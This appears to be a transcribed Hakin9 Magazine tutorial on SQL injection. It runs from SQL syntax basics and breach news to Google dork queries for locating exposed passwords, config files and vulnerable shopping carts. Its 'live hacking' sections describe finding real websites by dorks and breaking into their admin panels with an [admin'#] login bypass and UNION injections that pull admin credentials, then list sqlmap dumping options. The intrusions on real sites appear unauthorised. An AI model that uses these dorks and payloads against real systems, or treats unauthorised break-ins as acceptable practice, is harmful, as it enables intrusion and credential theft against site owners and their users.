Hacking with SQL Injections

Transcription

Hakin9 Magazine | Hacking with SQL Injections
Table of Contests
Module 1 – Introduction to SQL as a Developer Tool�� 4
2
Background Information��4
Developer Information��4
SQL Query Types��5
Select statement ��5
Insert statement��5
Update statement��5
Delete statement��6
Union Operator��6
Minus operator��6
SQL joins��6
SQL data types��7
SQL Clauses��8
Distinct clause��8
From Clause��8
Where Clause��8
Order by Clause��8
Group by Clause��9
Having Clause��9
Module 2 – Importance of SQL in Ethical Hacking�� 10
Introduction�� 10
Pre-requisites �� 10
Importance of SQL�� 10
Famous Websites that got hacked because of SQL Injection��11
Bell Canada – News��11
Hacker breaches Johns Hopkins University website ��11
Oracle’s MySQL.com hacked via SQL injection ��11
NASA sites hacked via SQL injection��11
New mass SQL injection attack infects 56,000 websites�� 12
Microsoft France hacked via SQL Injection�� 12
Yahoo quickly fixes Flickr SQL injection, remote code execution flaws �� 12
Google Hacking Database GHDB / Google hacking�� 12
Vulnerable Servers �� 16
Live Hacking�� 16
Hakin9 Magazine |
Hacking with SQL Injections | Hakin9 Magazine
Module 3 – Writing SQL Injections�� 19
Some Knowledge Base�� 19
Authentication bypass – SQL Injection�� 19
Union attack – SQL injection�� 20
SQLMAP the SQL Injection Tool�� 22
Module 4 – SQL Injections in Access, MSSQL, ORACLE and MySQL Databases�� 32
What we will cover�� 32
How to Identify Background Database Type�� 32
SQL Injections techniques for MySql Database�� 33
SQL Injection techniques for MS SQL Server�� 34
SQL injection Techniques for Oracle Database�� 35
SQL Injection Techniques for MS Access Database�� 35
Module 5 – Setting up Lab for practicing SQL Injections�� 36
Download Link�� 39
3
| Hakin9 Magazine
Module 1 – Introduction to
SQL as a Developer Tool
Background Information
SQL is a standardized query language for requesting information from a database. The original
version called SEQUEL (structured English query language) was designed by an IBM research
center in 1974 and 1975.
Oracle Corporation first introduced SQL as a commercial database system in 1979. SQL (Structured
Query Language) is nothing but a computer language designed to store, manipulate, and query data
stored in relational databases.
It is a well-established and standardized language also recognized by ISO.org.
“ISO/IEC 9075 defines the SQL language. The scope of the SQL language is the definition of data
structure and the operations on data stored in that structure. ISO/IEC 9075-1:2008, ISO/IEC 90752:2008 and ISO/IEC 9075-11:2008 encompass the minimum requirements of the language. Other
parts define extensions.
ISO/IEC 9075-1:2008 specifies the conceptual framework used in other parts of ISO/IEC 9075 to specify
the grammar of SQL and the result of processing statements in that language by an SQL-implementation.”
For more information visit http://www.iso.org/iso/catalogue_detail.htm?csnumber=45498.
4
Developer Information
SQL is not dependent on the any specific database. However, its main job is to speak to the
database in a well set and standard protocol which consists of different types of commands,
instructions and statements.
SQL is commonly secondhand to relational database technologies such as Oracle, Microsoft
Access, SSQL Server, MySQL, PostgreSQL and many more. We will present SQL in-depth as a
language for a developer in a categorical manner.
In this module, we will be presenting the syntax as well as a short description of the following SQL
statements & clauses information. You will find a bit of standard information, which might be similar
to the overall information available widely on the Internet. Hence, we will be taking you to the live
websites hackings while using SQL Injections in the upcoming module.
However, to achieve this, you need to understand the concepts. Therefore, this module is of much
importance to build the knowledge base initially.
Hakin9 Magazine |
SQL Query Types
5
We will be explaining quickly the SQL query types as shown the figure.
Select statement
The SQL SELECT statement is used to retrieve records from one or more tables in your SQL database.
Syntax
The syntax for the SQL SELECT statement is:
SELECT expressions FROM tables WHERE conditions;
Let’s look at an example showing how to use the SQL SELECT statement to select all fields from a table.
SELECT * FROM table_name WHERE column = ‘data’;
Insert statement
The SQL INSERT statement is used to insert one or more records into a table.
Syntax
The syntax for the SQL INSERT statement when inserting a single record using the VALUES keyword is:
Inert into table name (column1, column2) values (data1,data2);
Update statement
The SQL UPDATE statement is used to update existing records in the tables.
Syntax
The syntax for the SQL UPDATE statement when updating one table is:
UPDATE table SET column1 = expression1, column2 = expression2 WHERE conditions;
UPDATE table_name SET column_1 = data1 WHERE columns_2 = ‘match_data’;
| Hakin9 Magazine
Delete statement
The SQL DELETE statement is a used to delete one or more records from a table.
Syntax
The syntax for the SQL DELETE statement is:
DELETE FROM table_name WHERE conditions;
DELETE FROM table_name WHERE column_name = ‘match_date’;
Union Operator
The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
It removes duplicate rows between the various SELECT statements.
Each SELECT statement within the UNION must have the same number of fields in the result sets
with similar data types.
Syntax
The syntax for the SQL UNION operator is:
SELECT expression1, expression2, expression FROM tables WHERE conditions
UNION SELECT expression1, expression2 FROM tables WHERE conditions;
SELECT table_id FROM table_name UNION SELECT another_table_id FROM table_name;
Minus operator
The SQL MINUS operator is used to return all rows in the first SELECT statement not returned in the
second SELECT statement.
Each SELECT statement within the MINUS query must have the same number of fields in the result
sets with similar data types.
6
SQL joins
Hakin9 Magazine |
SQL JOINS are used to retrieve data from multiple tables. An SQL JOIN is performed whenever two
or more tables are joined in an SQL statement.
There are 4 different types of SQL joins:
•
•
•
•
SQL INNER JOIN (or sometimes called simple join)
SQL LEFT OUTER JOIN (or sometimes called LEFT JOIN)
SQL RIGHT OUTER JOIN (or sometimes called RIGHT JOIN)
SQL FULL OUTER JOIN (or sometimes called FULL JOIN)
SQL data types
The following is a list of general SQL data types that may not be supported by all relational databases.
Data Type
Syntax
Explanation (if applicable)
integer
integer
smallint
smallint
numeric
numeric(p,s)
Where p is a precision value; s is a scale value. For example, numeric (6, 2) is
a number that has 4 digits before the decimal and 2 digits after the decimal.
decimal
decimal(p,s)
Where p is a precision value; s is a scale value.
real
real
Single-precision floating point number
double precision
double precision
Double-precision floating point number
float
float(p)
Where p is a precision value.
character
char(x)
Where x is the number of characters to store. This data type is space
padded to fill the number of characters specified.
character varying
varchar2(x)
Where x is the number of characters to store. This data type does NOT
space pad.
bit
bit(x)
Where x is the number of bits to store.
bit varying
bit varying(x)
Where x is the number of bits to store. The length can vary up to x.
date
date
Stores year, month, and day values.
time
time
Stores the hour, minute, and second values.
timestamp
timestamp
Stores year, month, day, hour, minute, and second values.
time with time zone
time with time zone
Exactly the same as time, but also stores an offset from UTC of the time
specified.
timestamp with time zone
timestamp with time Exactly the same as timestamp, but also stores an offset from UTC of the
zone
time specified.
year-month interval
Contains a year value, a month value, or both.
day-time interval
Contains a day value, an hour value, a minute value, and/or a second
value.
7
| Hakin9 Magazine
SQL Clauses
Distinct clause
The SQL DISTINCT clause is used to remove duplicates from the result set of a SELECT statement.
8
Syntax
The syntax for the SQL DISTINCT clause is:
SELECT DISTINCT expressions FROM tables WHERE conditions;
SELECT DISTINCT city FROM table_name;
From Clause
The SQL FROM clause is used to list the tables, and any joins required for the SQL statement.
Syntax
The syntax for the FROM Clause in SQL is:
Select column1, column2 from table_name
SELECT * FROM suppliers WHERE city = ‘Newark’ ORDER BY city DESC;
Where Clause
The SQL WHERE clause is used to filter the results and apply conditions in a SELECT, INSERT,
UPDATE, or DELETE statement.
Syntax
The syntax for the SQL WHERE Clause is:
WHERE conditions;
SELECT * FROM table_name WHERE column_name = hakin9;
Order by Clause
The SQL ORDER BY clause is used to sort the records in the result set for a SELECT statement.
Hakin9 Magazine |
Syntax
The syntax for the SQL ORDER BY clause is:
SELECT expressions FROM tables WHERE conditions ORDER BY expression [ASC | DESC];
ASC is optional. It sorts the result set in ascending order by expression (default if no modifier is provider).
DESC is optional. It sorts the result set in descending order by expression.
Group by Clause
The SQL GROUP BY clause can be used in a SELECT statement to collect data across multiple
records and group the results by one or more columns.
Syntax
The syntax for the SQL GROUP BY clause is:
SELECT department, SUM(sales) AS “Total sales” FROM order_details GROUP BY
department;
Having Clause
The SQL HAVING Clause is used in combination with the GROUP BY Clause to restrict the groups of
returned rows to only those who’s the condition is TRUE.
Syntax
The syntax for the SQL HAVING Clause is:
SELECT department, MIN (salary) AS “Lowest salary” FROM employees GROUP BY
department HAVING MIN(salary) > 35000;
9
| Hakin9 Magazine
Module 2 – Importance of
SQL in Ethical Hacking
Introduction
In this module, we will present the importance of the SQL and SQL injections in the ethical hacking
field. To present this, we will also present the live hacking information with the snapshots so that you
can learn with the practical examples and also enjoy how to feel when you make it happen.
Pre-requisites
•
•
•
•
Sound knowledge of HTML
Basic knowledge of any one database server
Understanding of how SQL works
Prior experience as a software developer is a plus
Importance of SQL
If you guys think that hacking into any targeted network is easy, then it is not that easy anymore.
Considering that the increasing concepts & technologies of intrusion detection and intrusion
prevention systems, firewalls and security awareness among the industry people. The terminology of
information security is very much common now.
10
Whenever you will be performing ethical hacking or let’s say penetration testing. You will phase
many difficulties in finding the actual security holes in the targeted network, and the easiest way to
find out the bugs in the target is via web applications. Now, considering the web applications are
easily accessible via only a browser, you need to be good in hacking into web applications that are
nearly impossible without the expertise in SQL and SQL injections.
We have presented some basic knowledge of SQL in the previous module, which covers the
required info, which you need to know in order to go toward SQL injections.
Considering the above scenario we have discussed. In such cases, the only way of finding
vulnerabilities and hacking into the targeted system are as follows:
• Identify vulnerabilities in the Web Server
• Identify vulnerabilities in the Web Application
Web applications, which work in connection with a database connected in the background, are more
attractive to hackers and of course there are more chances of identifying vulnerabilities in such cases.
Hakin9 Magazine |
Example
How it works, you quickly scan a target IP Address by finding that the only accessible port on the
target machine is port 80, which is the web. How will you proceed? You will go and explore the web
to find out what is available there. Let’s scan one target (live example) and see what is the outcome.
You can see the above results that only port 80 is accessible being open the other two are useless
for us at this moment as both are closed.
Famous Websites that got hacked because of SQL Injection
Bell Canada – News
“Bell Canada confirmed Sunday that usernames and passwords of 22,421 and five valid credit
card numbers have been leaked by hackers. However, the organization points finger at Third-party
saying the leak “results from illegal hacking of an Ottawa-based third-party supplier’s information
technology system”.
11
Bell claims its network wasn’t affected by this breach. Bell has disabled all passwords and notifying
all affected users. They are currently working with law enforcement and government security officials
to investigate the matter. See more at:
• http://www.ehackingnews.com/2014/02/bell-confirms-database-leaked-by-nullcrew.html
• http://www.ehackingnews.com/2014/02/nullcrew-hackers-claims-to-have-hacked.html
Hacker breaches Johns Hopkins University website
Hacker claiming to be part of the Anonymous hackers group has breached the Johns Hopkins
University website and leaked the data compromised from the database server. See more at: http://
www.ehackingnews.com/2014/03/hacker-breaches-johns-hopkins.html.
Oracle’s MySQL.com hacked via SQL injection
Hackers over the weekend compromised Oracle’s MySQL.com customer website via SQL injection
and posted a list of usernames and passwords online.
Two Romanian hackers using the aliases “TinKode” and “NeOh” have taken responsibility for the
attack and said they exploited an SQL injection flaw to break into the web servers hosting MySQL.
com, a website for the popular open source database product (http://www.scmagazine.com/oraclesmysqlcom-hacked-via-sql-injection/article/199419/).
NASA sites hacked via SQL injection
Two NASA sites recently were hacked by an individual wanting to demonstrate that the sites are
susceptible to SQL injection.
| Hakin9 Magazine
The websites for NASA’s Instrument Systems and Technology Division and Software Engineering
Division were accessed by a researcher, who posted to his blog screen shots taken during the hack.
The researcher, using the alias “c0de.breaker,” used SQL injection to hijack the sites, Gunter Ollmann,
VP of research at security firm Damballa, who recently wrote about the hack, told SCMagazineUS.com
on Monday, http://www.scmagazine.com/nasa-sites-hacked-via-sql-injection/article/159181/.
New mass SQL injection attack infects 56,000 websites
Tens of thousands of websites have been compromised with a suite of malware containing backdoors,
password stealers and downloaders, according to a security firm.
“It’s a pretty potent concoction, from a malware perspective,” Mary Landesman, ScanSafe’s senior
security researcher, told SCMagazineUS.com on Monday.
So far, more than 56,000 sites have been compromised – via SQL injection – with a malicious
IFRAME that loads exploits from several attacker-owned domains, Landesman said. The malwarehosting domains were registered between Aug. 3 and 9.
The compromised sites can be identified through a Google search for a malicious IFRAME script
tag. The infected sites vary in category, but a number of charitable, nursing and travel sites particularly
have been targeted (http://www.scmagazine.com/new-mass-sql-injection-attack-infects-56000websites/article/147178/).
Microsoft France hacked via SQL Injection
Acunetix secures web applications and prevents website defacement and irreversible damage to
your company’s reputation London, UK – 19 June, 2006 – One of the websites of Microsoft France
was attacked this weekend by a group of Turkish hackers who defaced the site by Web Server
intrusion. TiTHack, the handle used by the hackers, defaced experts.microsoft.fr by exploiting
a vulnerability found either in IIS6 or in one of the web applications running on the site.
The attack seems to have been done “for fun”. However, the defacement has already caused
Microsoft France significant embarrassment further damaging the corporation’s global reputation.
Bloggers immediately picked up on the defacement and were amused at how long it took Microsoft
to fix the problem. At time of writing, the website remains unavailable after at least 1 day in its state
of defacement (http://www.acunetix.com/blog/news/microsoft-france-hacked/).
12
Yahoo quickly fixes Flickr SQL injection, remote code execution flaws
A security researcher identified flaws in popular photo sharing service Flickr that could result in SQL
injection and remote code execution, but Yahoo acknowledged and quickly patched the problems
(http://www.scmagazine.com/yahoo-quickly-fixes-flickr-sql-injection-remote-code-execution-flaws/
article/342602/).
Google Hacking Database GHDB / Google hacking
Google hacking is the terminology, which is widely used when a hacker tries to find exploitable
targets and sensitive data by using Google search engine.
The Google Hacking Database (GHDB) is a database of queries that identify sensitive data!
What type of information you can gain by using Google queries are listed below. We will explain a
couple of key queries in a tabular form.
Advisories and Vulnerabilities
These searches locate vulnerable servers. These searches are often generated from various security
advisory posts, and in many cases are product or version-specific.
Error Messages
Really retarded error messages that say WAY too much!
Files containing juicy info
No usernames or passwords, but interesting stuff none the less.
Hakin9 Magazine |
Files containing passwords
PASSWORDS!!! Google found PASSWORDS!
Files containing usernames
These files contain usernames, but no passwords... Still, Google finding usernames on a web site.
Below chart is the extract from the famous security websites, which you might found difficult to find
by yourself. Store this information with you all time. This is one of the key queries which you might
need to know and require in your hacking attempts to know more about usernames while hacking.
Title
Summary
bash_history files
Ok, this file contains what a user typed at a shell command prompt. You
shouldn’t advertise this file. You shouldn’t flash it to a web crawl ...
sh_history files
Ok, this file contains what a user typed at a shell command prompt. You
shouldn’t advertise this file. You shouldn’t flash it to a web crawl ...
inurl:admin inurl:userlist
This search reveals userlists of administrative importance. Userlists found
using this method can range from benign “message group” lists to ...
inurl:admin filetype:asp inurl:userlist
This search reveals userlists of administrative importance. Userlists found
using this method can range from benign “message group” lists to ...
“index of” / lck
These lock files often contain usernames of the user that has locked the file.
Username harvesting can be done using this technique. ...
index.of perform.ini
This file contains information about the mIRC client and may include channel
and user names. ...
inurl:php inurl:hlstats intext:”Server Userna...
This page shows the halflife stat script and reveals the username to the
system. Table structure, database name and recent SQL queries are also
shown ...
+intext:”webali zer” +intext:”Total ...
The webalizer program displays various information but this query displays
usernames that have logged into the site. Attckers can use this information ...
filetype:reg reg HKEY_CURRENT_USER username
This search finds registry files from the Windows Operating system.
Considered the “soul” of the system, these files, and snippets from thes ...
filetype:reg reg +intext:”intern et account ma...
This google search reveals users names, pop3 passwords, email addresses,
servers connected to and more. The IP addresses of the users can also be
reve ...
filetype:log username putty
These log files record info about the SSH client PUTTY. These files contain
usernames, site names, IP addresses, ports and various other information
a ...
filetype:conf inurl:proftpd.conf -sample
A standard FTP configuration file that provides far too many details about
how the server is setup, including installation paths, location of logfile ...
OWA Public folders & Address book
This search jumps right to the main page of Outlook Web Access Public
Folders and the Exchange Address Book:.An attacker can use the
addressbook to e ...
intext:”SteamUs erPassphrase=” intext:&qu...
This will search for usernames and passwords for steam (www.steampowered.
com) taken from the SteamApp.cfg file. ...
site:extremetracking .com inurl:”login=&q uot;
The search reveals usernames (right in the URL in green) and links to the
sites that are signed up with extremetracking.com. From here an attacker
can ...
Footholds
Examples of queries that can help a hacker gain a foothold into a web server.
Pages containing login portals
These are login pages for various services. Consider them the front door of a website’s more
sensitive functions.
Pages containing network or vulnerability data
These pages contain such things as firewall logs, honeypot logs, network information, IDS logs... all
sorts of fun stuff!
| Hakin9 Magazine
13
Sensitive Directories
Google’s collection of web sites sharing sensitive directories. The files contained in here will vary
from sensitive to uber-secret!
Sensitive Online Shopping Info
Examples of queries that can reveal online shopping info like customer data, suppliers, orders, credit
card numbers, credit card info.
Title
Summary
POWERED BY HIT JAMMER 1.0!
Hit Jammer is a Unix compatible script that allows you to manage the content and traffic
exchange and make web changes, all without needing HTML. It i ...
VP-ASP Shop Administrators only
VP-ASP (Virtual Programming – ASP) has won awards both in the US and France. It is now in use
in over 70 countries. VP-ASP can be used to build any ty ...
Comersus.mdb database
Comersus is an e-commerce system and has been installed all over the world in more than
20000 sites. Using Comersus does not require that you know any ...
inurl:shopdbtest.asp
shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script
allows remote attackers toview the database location, and ...
“More Info about MetaCart Free”
MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability
in the free demo version of the product (MetaCartFree) ...
inurl:midicart.mdb
MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL
database. A security vulnerability in the product allows remote at ...
site:ups.com intitle:"Up
s Package trackin...
Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want
to Man-in-the-middle their delivery? Well, then here it is.-Dig ...
intext:”powered
Controller” i...
Hosting
Description:==============Hosting Controller is a complete array of Web hosting
automation tools for the Windows Server family platform. It is the onl ...
X-Cart:
X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn’t seem to be any
way to search for specific versions of the sof ...
by
intext:”Powered
by
shopping cart soft...
14
Various Online Devices
This category contains things like printers, video cameras, and all sorts of cool things found on the
web with Google.
Vulnerable Files
Many of vulnerable files that Google can find on websites.
Title
Summary
intitle:”Index of /” modified
php.exe
PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary
files on the hard disk, for example by requesting “ ...
filetype:php
-”ind...
“
Programmers do strange things sometimes and forget about security. This search is the perfect
example. These php scripts are written for viewing files ...
-cvs
The MySQL database system uses my.cnf files for configuration. It can include a lot of information,
ranging from pathes, database names up to passwords ...
filetype:cnf
-example
inurl:”viewfile
my.cnf
filetype:wsdl wsdl
The XML headers are called *.wsdl files. They can include data, functions or objects. An attacker
with knowledge of XML coding can sometimes do evil th ...
filetype:inc inc intext:setcookie
Cookies are often used for authentication and a lot of other stuff. The “inc” php header files often
include the exact syntax of the cookies. ...
ext:cgi inurl:ubb6_test
The UBB trial version contains files that are not safe to keep online after going live. The install
files clearly state so: CAUTION; Do not leave patht ...
intitle:”PHP Explorer” ext:php
(inurl:ph...
This searches for PHP Explorer scripts. This looks like a file manager with some nice extra
options for an attacker, such as phpinfo, create/list dire ...
inurl:robpoll.cgi filetype:cgi
robpoll.cgi is used to administrate polls.The default password used for adding polls is ‘robpoll’.
All of the results should look something ...
Hakin9 Magazine |
inurl:”plog/reg ister.php”
pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites
running it. The installation documents clearly warn about r ...
link:http://www.toas tforums.com/
Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features
of an advanced message board (see hxxp://www.toastforums. ...
inurl:”nph-prox y.cgi” “Start
browsi...
Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks
up on food and then hibernates, a web cracker must ...
Gallery configuration setup files
Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs
will be found and Google will find more installations. ...
PHP-Nuke – create super user
right now !
PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think
we let this one describe itself, quoting from a vulnera ...
filetype:lit lit (books|ebooks)
Tired of web searching? Want something to read? You can find Ebooks (thousands of them) with
this search. LIT files can be opened with Microsoft Read ...
inurl:cgi.asx?StoreI D
BeyondTV is a web based software product which let you manage your TV station. All you need
is to install a TV tuner card on your PC and Connect your ...
inurl:” WWWADMIN.PL” intitle:
”wwwad. ..
www.admin.pl is a script that allows a user with a valid username and password, to delete files
and posts from the associated forum. ...
inurl:changepassword .cgi -cvs
Allows a user to change his/her password for authentication to the system. Script allows for
repeated failed attempts making this script vulnerable t ...
intitle:”Direct
“tree v...
Listing”
Dirlist is an ASP script that list folders in an explorer style: * Tree * Detailed * Tiled Quote: *Lists
files and directories in either a Tree ...
intitle:mywebftp “Please enter
your password&...
MyWebFTP Free is a free lite version of MyWebFTP Personal – a PHP script providing FTP client
capabilities with the user interface in your browser. In ...
ezBOO
-cvs
ory
“Administrator
Panel”
ezBOO WebStats is a high level statistical tool for web sites monitoring. It allows real time access
monitoring on several sites. Based on php and m ...
intitle:”ASP FileMan”
-site:iiswo...
Resend
FileMan is a corporate web based storage and file management solution for intra- and internet.
It runs on Microsoft IIS webservers and is written in A ...
intitle:”phprem oteview” filetype:
php &qu...
phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the
server filesystem use the online php interpreter.vendor: ...
“File Upload
“rename ...
thepeak file upload manager let you manage your webtree with up and downloading files. ...
Manager
v1.3”
inurl:click.php intext:PHPClickLog
A script written in PHP 4 which logs a user’s statistics when they click on a link. The log is stored
in a flatfile (text) database and can be ...
“powered by YellDL”
Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in
PHP. Unfortunately this downloader downloads everything you ...
filetype:cgi inurl:cachemgr.cgi
cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default
in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with ...
ext:asp inurl:DUgallery intitle:
”3.0&qu ot; -s...
The MS access database can be downloaded from inside the docroot. The user table holds the
admin password in plain text. Possible locations for the du ...
ext:asp “powered by DUForum”
inurl:(mess...
DUForum is one of those free forum software packages. The database location is determined by
the config file “connDUforumAdmin.asp”, but the ...
“Powered by Land Down Under 601”
sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access.
An exploit exists on the internet, search google. ...
inurl:php.exe
-example.com
It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it
is enabled), even across drives. (Note: The GHDB h ...
filetype:exe
filetype:mdb inurl:”news/new s”
Web Wiz Site News unprotected database holds config and admin information in a Microsoft
access database in news/news.mdb. This information is almost ...
filetype:pl
-intext:”/usr/b
in/perl” inu...
WebCal allows you to create and maintain an interactive events calendar or scheduling system
on your Web site. The file names explain themselves, but ...
inurl:cgi-bin inurl:bigate.cgi
Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won’t work. ...
intitle:”SSHVnc Applet”OR intitle:
”...
sSHTerm Applet en SSHVnc Applet pages. ...
intitle:”PHPsta t” intext: ”Browser
&q...
Phpstat shows nice statistical information about a website’s visitors. Certain versions are also
contain vulnerabilities: http://www.soulblack.co ...
| Hakin9 Magazine
15
filetype:mdb “standard jet”
These Microsoft Access Database files may contain usernames, passwords or simply prompts
for such data. ...
“Powered by Gravity Board”
4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL
Injection / Login Bypass, cross site scripting, path disclos ...
“Powered by SilverNews”
silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands
execution / cross site scripting software: author site: ...
PHPFreeNews inurl:Admin.php
29/07/2005 8.36.03PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross
site scripting, path disclosure, information disclosure ...
inurl:nquser.php filetype:php
Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc
exploit software: author site: http://www.virtech.org/tools/ ...
“Powered By: Simplicity
Upload” inurl...
16
oF
26/07/2005 16.09.18Simplicity OF Upload 1.3 (possibly prior versons) remote code execution &
cross site scriptingsoftware: author site: http://www ...
“Powered
by
FlexPHPNews”
inurl:news | in...
24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting &
resource consumption poc exploitsoftware:author site:http ...
“Powered by FunkBoard”
FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/
password disclosure & board takeover, possible remote ...
“Powered by Xcomic”
“Powered by xcomic”this is a recent exploit, you can retrieve any file on target systemby using
“../” chars and null byte (%00), e ...
“Warning:” “Cannot execute a
blank ...
“Warning: passthru(): Cannot execute a blank command in” “Warning: system(): Cannot execute
a blank command in” “Warning: exe ...
“Mail-it Now!” intitle:”Contac
t for...
Mail-it Now! 1.5 (possibly prior versions) contact.php remote code executionsite: http://www.
skyminds.net/source/description: a mail form scriptvulner ...
“maxwebportal&q
inurl:”default& quot;...
uot;
several vulnerabilities relating to this.MaxWebPortal is a web portal and online community
system which includes features such as web-based administra ...
“e107.org
2002/2003”
inurl:forum_post.ph. ..
e107 is prone to an input validation vulnerability. This issue is due to a failure in the application
to properly sanitize user-supplied input.Success ...
inurl:cartwiz/store/ index.asp
The CartWIZ eCommerce Shopping Cart System will help you build your online store through an
interactive web-based e-commerce administration interface. ...
intitle:”Contro
“Control Pa...
Build, manage and customize your own search engine friendly news / article site from scratch
– with absolutely no technical experience. Authentication ...
l
panel”
“powered by my little forum”
My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_
little_foru msoftware: “A simple web-forum that suppo ...
“powered by mailgust”
MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://
www.mailgust.org/description:Mailgust is three softwares ...
intitle:”CJ Link Out V1”
A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout is a
free product which allows you to easily let users c ...
inurl:guestbook/gues tbooklist.
asp “Post Date&...
A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.
securityfocus.com/archive/1/4147 08/30/0/threadedSeveral ...
inurl:updown.php
|
intext:”Powered by PHP Upl...
this (evil ) script lets you to upload a php shell on target server, in most cases not password
protected dork: inurl:updown.php | intext:”Powere ...
inurl:”simplene ws/admin”
hxxp://evuln.com/vulns/94/summary.html ...
Vulnerable Servers
These searches reveal servers with specific vulnerabilities. These are found in a different way than
the searches found in the “Vulnerable Files” section.
Web Server Detection
These links demonstrate Google’s awesome ability to profile web servers..
Live Hacking
Let’s use one of the above Google Hacking Database queries to hack into websites. We used following
queries as shown in the figure below to find some vulnerable targets quickly.
Hakin9 Magazine |
Now, narrow our search and ended up into following portal.
17
Bypassing authentication by use of SQL Injections as shown below:
| Hakin9 Magazine
Accessed the admin panel.
We will be presenting more on live hacking web applications in upcoming modules.
Keep learning, keep hakin9
18
Hakin9 Magazine |
Module 3 – Writing SQL
Injections
Introduction
In this module, we will be presenting demonstrations on how to hack into websites via SQL Injections.
This would be based on the live penetration testing scenarios, so don’t miss this workshop!!
Pre-requisites
•
•
•
•
•
Sound knowledge of HTML
Basic knowledge of any one database server
Understanding of how SQL works
Prior experience as a software developer is a plus
Prior modules of this workshop should be completed first
Some Knowledge Base
Structured Query Language [SQL], As of now, you should be good enough in SQL before you proceed
towards learning how to hack the box by using SQL injections. Once you are good enough in SQL, then
it is much convenient to execute SQL injections. Furthermore, if you are good in SQL then you already
know how to use SQL statements and different techniques of SQL to hack into the box.
19
What is SQL injection?
“SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client
to the application” in this way you use the query in SQL to exploit another query written by the developer.
Let’s give some real examples in providing proof of concepts.
Authentication bypass – SQL Injection
In most simple words, by this type of SQL injection, you simply type SQL query. The query works
like an injection to bypass the authentication written by the developer in the form of pre-written SQL
query in the background.
Live Example
In this login bypass attack, we tried using [‘OR ‘a’=’a] injection method, but we failed. However, when
we saw that this website is built with PHP, we simply typed the PHP bypass method injection to get
access to Administration Panel as shown in below snapshots.
| Hakin9 Magazine
Login panel of the website which we got access via Google hacking database as explained in
previous module. Let’s proceed.
We use login bypass SQL injection [admin’#] of mysql server to bypass the authentication as we
committed the password matching in SQL query by typing [#] after [admin’]. This means that it will
only look for [admin] as user in the database and if found will give us access.
20
This is the SQL injection damage! By only typing [admin’#] as an SQL injection attack. We get full
access to Admin Panel, and the website is compromised. We can further proceed by defacing the
website, but that’s not the scope of penetration testing.
Union attack – SQL injection
In this type of SQL injection attack, union query is used to steal the data from the database or
sometimes bypass the security controls as well. This is one of the most dangerous types of SQL
injection. Let’s do it.
We have a target, which is vulnerable to SQL injection how; let’s give you the evidence as below.
We used the [ ‘ ] after ID= in the URL and found the below results.
Hakin9 Magazine |
The error message confirms that this website is vulnerable to SQL Injection attack and we will now
proceed to injection UNION sql injection. Now in the vulnerable URL, we used the following injection
query and got the below error message.
Injection:
index.asp?id=-1 union select 1 from admin.
Error Message
Microsoft OLE DB Provider for ODBC Drivers error ‘80004005’
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two
selected tables or queries of a union query do not match.
This means that in the database table [admin] exists; we need to just match the number of columns
in our injection query of union.
21
We went till matching the number of columns by simply adding 1 more columns at every single
attempt and found no error, but the following page as shown below.
Injection: index.asp?id=-1
union select 1,2,3,4,5,6,7,8,9
from admin.
This means that on this page id 3,4 & 9 are displayed, which confirms that if we can get the columns
names. Instead of using numeric fields as shown, we can retrieve the data from the database by
using this union attack. Since we have [admin] as table so most probably columns could be similar
to username or password. We tried this multiple times and got the two fields as [user] & [pass].
Injection: index.asp?id=-1
union select 1,2,3,user,5,6,7,8,pass
from admin.
| Hakin9 Magazine
Got the username and password for the admin account as shown in above figure. Website
compromised by using UNION SQL Injection.
SQLMAP the SQL Injection Tool
So far, you have been enjoying hacking into web applications by means of manual SQL injection
techniques. Since now, you have the background knowledge how SQL injection works, lets use
SQLMAP to proceed further and hack sensitive information. SQLMAP is the python based tool to
execute automated SQL Injection queries and unloads burden from your head and save time in
penetration testing. Below you can see parameters, which can be used to achieve the respective
goals with SQLMAP.
Usage: sqlmap [options]
22
-h, --help – Show basic help message and exit
-hh – Show advanced help message and exit
--version – Show program’s version number and exit
-v VERBOSE – Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to set the target(s)
-u URL, --url=URL – Target URL (e.g. “www.target.com/vuln.
php?id=1”)
-g GOOGLEDORK – Process Google dork results as target URLs
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in
the tables. Moreover you can run your own SQL statements
-a, --all – Retrieve everything
-b, --banner – Retrieve DBMS banner
--current-user – Retrieve DBMS current user
--current-db – Retrieve DBMS current database
--passwords – Enumerate DBMS users password hashes
--tables – Enumerate DBMS database tables
--columns – Enumerate DBMS database table columns
--schema – Enumerate DBMS schema
--dump – Dump DBMS database table entries
--dump-all – Dump all DBMS databases tables entries
-D DB – DBMS database to enumerate
-T TBL – DBMS database table to enumerate
-C COL – DBMS database table column to enumerate
Request:
These options can be used to specify how to connect to the target
URL
--data=DATA – Data string to be sent through POST
